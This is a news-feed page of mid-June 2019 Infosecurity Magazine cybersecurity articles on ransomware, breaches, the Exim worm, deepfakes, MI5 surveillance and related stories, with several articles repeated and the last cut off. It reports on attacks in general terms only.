Info Security

Subscribe to Info Security  feed
Updated: 40 min 4 sec ago

Europol Gamifies Cryptocurrency Crime Prevention

Mon, 06/17/2019 - 08:59
Europol Gamifies Cryptocurrency Crime Prevention

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization claimed that over 300 experts in cryptocurrency, from both the police and private sector, attended its headquarters in The Hague for the region’s largest conference of its kind last week.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay, Bitcoin.de, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

Categories: Cyber Risk News

US Lawmakers Hear Testimony on Concerns of Deepfakes

Fri, 06/14/2019 - 17:16
US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Swartzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on raising concerns about the threat of  "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund, Clint Watts was part of a four-person panel that testified before the lawmakers on the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Neiman Labs looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Categories: Cyber Risk News

US Lawmakers Hear Testimony on Concerns of Deepfakes

Fri, 06/14/2019 - 17:16
US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Swartzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on raising concerns about the threat of  "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund Clint Watts was part of a four-person panel that testified before the lawmakers of the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Neiman Labs looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Categories: Cyber Risk News

Malware a Serious Threat for Industrial Orgs

Fri, 06/14/2019 - 17:09
Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Categories: Cyber Risk News

Canadian City Fell Prey to a $375K Phish

Fri, 06/14/2019 - 15:46
Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to a "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.  

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Categories: Cyber Risk News

Home Secretary Signs Assange US Extradition Request

Fri, 06/14/2019 - 10:30
Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has approved an extradition request from the US for WikiLeaks founder Julian Assange to be extradited.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count court order detailing charges related to Assange’s publishing of that classified info, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Categories: Cyber Risk News

Millions of Email Servers at Risk from Cryptomining Worm

Fri, 06/14/2019 - 08:50
Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appears to be two waves of attack: the first involved attackers initially pushing out exploits from a command and control (C2) server on the clear web. However, the second seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”

Categories: Cyber Risk News

MI5 Breached Surveillance Law for Years

Fri, 06/14/2019 - 08:05
MI5 Breached Surveillance Law for Years

MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted data...is currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose',” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

Categories: Cyber Risk News

Employees Out of Work After ASCO Hit by Ransomware

Thu, 06/13/2019 - 18:34
Employees Out of Work After ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Categories: Cyber Risk News

Employees Out of Work after ASCO Hit by Ransomware

Thu, 06/13/2019 - 18:34
Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Categories: Cyber Risk News

Gaming's All Fun and Games Till Someone Gets Hacked

Thu, 06/13/2019 - 18:27
Gaming's All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Categories: Cyber Risk News

AGs Warn ACMA Breach Impact Rose to Over 20 Million

Thu, 06/13/2019 - 15:40
AGs Warn ACMA Breach Impact Rose to Over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorney generals (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Categories: Cyber Risk News

AGs Warn ACMA Breach Impact Rose to over 20 Million

Thu, 06/13/2019 - 15:40
AGs Warn ACMA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorney generals (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Categories: Cyber Risk News

UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Thu, 06/13/2019 - 10:25
UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, Onelogin claimed, speci?cally regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

Categories: Cyber Risk News

UK Orgs Lose 2.5 Months a Year on Poor Password Management

Thu, 06/13/2019 - 10:25
UK Orgs Lose 2.5 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, Onelogin claimed, speci?cally regarding password rotation and checking passwords against lists of commonly-used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists and 78% do not check employee passwords against password complexity algorithms.

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

Categories: Cyber Risk News

“Major Flaw” Discovered in Evernote’s Chrome Extension

Thu, 06/13/2019 - 09:01
“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal XSS marked CVE-2019-12592 which could have allowed threat actors to extract personal information from the browser environment, was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled-out a complete fix.

According to Guardio: The logical coding error in the Web Clipper extension could have allowed an attacker to bypass the browser’s same origin policy, granting the attacker code execution privileges in Iframes beyond Evernote’s domain. As the browser’s domain-isolation mechanisms were broken, code could be executed that could allow an attacker to perform actions on behalf of the user as well as grant access to sensitive user information on affected third-party web pages and services, including authentication, financials, private conversations in social media, personal emails, and more.

Michael Vainshtein, CTO at Guardio, said: “The vulnerability we discovered is a testament to the importance of scrutinizing browser extensions with extra care. People need to be aware that even the most trusted extensions can contain a pathway for attackers. All it takes is a single unsafe extension to compromise anything you do or store online. The ripple effect is immediate and intense.”

The story highlights the importance of swift vulnerability disclosure, response and remediation, particularly given the fact that the flaw had the potential to affect any number of Evernote’s users (around 4,600,000 at the time of discovery).

Categories: Cyber Risk News

KnowBe4 Gets Whopping $300m in Funding

Wed, 06/12/2019 - 17:17
KnowBe4 Gets Whopping $300m in Funding

A private equity giant has invested an additional $300 million in cybersecurity awareness firm KnowBe4 only three months after announcing its initial investment of $50 million, according to Fortune.

At the helm of the company, which provides integrated security awareness training and a simulated phishing platform, are Stu Sjouwerman, CEO, and Kevin Mitnick, chief hacking officer. Founded in 2010, the company now boasts more than 25,000 users across the globe from highly regulated industries to global organizations.

“The company helps organizations address the human element of security by raising awareness of ransomware, CEO fraud and other social engineering tactics through a new-school approach to security awareness training,” the June 12 press release said.

“Having secured additional funding, as well as 'unicorn' status as a private company valued at $1 billion, KnowBe4 now plans to continue an ambitious international expansion that, in 2019 alone, has seen it acquire two cybersecurity companies located in different parts of the globe: Brazil-based El Pescador and Norway-based CLTRe,” Fortune reported.

In response to the company earning unicorn status, KnowBe4 CEO Stu Sjouwerman lauded the relationship the company has built with its investment firm, KKR. Sjouwerman’s blog post emphasized his plentiful gratitude:

I'd like to thank you for your trust in us, and for telling your friends about our platform. This is only the beginning of building a strong human firewall and we still need all the help we can get.

So from the bottom of our hearts, thank you so much. We will continue doing our level best to help you keep your organization safe, and please keep spreading the word.

“Organizations are beginning to understand that when it comes to security, building a human firewall takes precedence over merely deploying technology,” Sjouwerman told Infosecurity. “This investment is a representation of what we're seeing in the market, which is more emphasis placed on the area of security awareness training and education as a key way to manage the ongoing problem of social engineering.”

Categories: Cyber Risk News

Philly Courts Still Down After Cyber-Attack

Wed, 06/12/2019 - 16:51
Philly Courts Still Down After Cyber-Attack

After a May 21, 2019, cyber-attack downed Philadelphia’s online court system for e-filing and docketing services, issues remain throughout the county, according to Government Technology.

On June 11, Government Technology reported that the computer networks of the Luzerne County Correctional Facility in Pennsylvania continue to be impacted, leaving inmates unable to order items from the jail commissary.

“The First Judicial District and City OIT are working in concert to ensure the safety of the First Judicial District’s electronic web system following the discovery of malware on a limited number of FJD workstations. As a precautionary measure the FJD’s website, employee email accounts, and electronic filing (e-file) have been temporarily suspended,” a May 31 notice from the The Philadelphia Courts First Judicial District of Pennsylvania stated.

“We are currently unable to provide more information concerning this virus so as not to provide any detail-specific information that could jeopardize the remediation process we are engaged in. In addition to City OIT, the FJD is contracting the services of a firm specializing in cybersecurity to assist in getting impacted operations restored safely.”

Since then, the courts have been using social media to engage with members of the community. On June 10, the Philadelphia courts expressed appreciation for the community’s patience as employees work to meet filing needs.

The city has reportedly hired a cybersecurity firm to investigate the attack, though said firm has not been named.

“Declining to name a publicly funded contractor has raised eyebrows. So far, the court has described the unnamed vendor as a firm 'specializing in cyber security to assist in getting impacted operations restored safely.' Courts spokesperson Marty O’Rourke has declined repeated requests for the name of the vendor – as well as the amount the city is paying for these services,” Billy Penn’s Max Marin reported.

Categories: Cyber Risk News

Philly Courts Still Down after Cyber-Attack

Wed, 06/12/2019 - 16:51
Philly Courts Still Down after Cyber-Attack

After a May 21, 2019, cyber-attack downed Philadelphia’s online court system for e-filing and docketing services, issues remain throughout the county, according to Government Technology.

On June 11, Government Technology reported that the computer networks of the Luzerne County Correctional Facility in Pennsylvania continue to be impacted, leaving inmates unable to order items from the jail commissary.

“The First Judicial District and City OIT are working in concert to ensure the safety of the First Judicial District’s electronic web system following the discovery of malware on a limited number of FJD workstations. As a precautionary measure the FJD’s website, employee email accounts, and electronic filing (e-file) have been temporarily suspended,” a May 31 notice from the The Philadelphia Courts First Judicial District of Pennsylvania stated.

“We are currently unable to provide more information concerning this virus so as not to provide any detail-specific information that could jeopardize the remediation process we are engaged in. In addition to City OIT, the FJD is contracting the services of a firm specializing in cybersecurity to assist in getting impacted operations restored safely.”

Since then, the courts have been using social media to engage with members of the community. On June 10, the Philadelphia courts expressed appreciation for the community’s patience as employees work to meet filing needs.

The city has reportedly hired a cybersecurity firm to investigate the attack, though said firm has not been named.

“Declining to name a publicly funded contractor has raised eyebrows. So far, the court has described the unnamed vendor as a firm 'specializing in cyber security to assist in getting impacted operations restored safely.' Courts spokesperson Marty O’Rourke has declined repeated requests for the name of the vendor – as well as the amount the city is paying for these services,” Billy Penn’s Max Marin reported.

Categories: Cyber Risk News

Flaw in SymCrypt Can Trigger DDoS

Wed, 06/12/2019 - 15:33
Flaw in SymCrypt Can Trigger DDoS

A vulnerability in the SymCrypt cryptographic library of Microsoft's OS can trigger a distributed denial-of-service (DDoS) disruption in Windows 8 servers and above, causing a perpetual operation "when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric," according to Tavis Ormandy, a Google researcher.

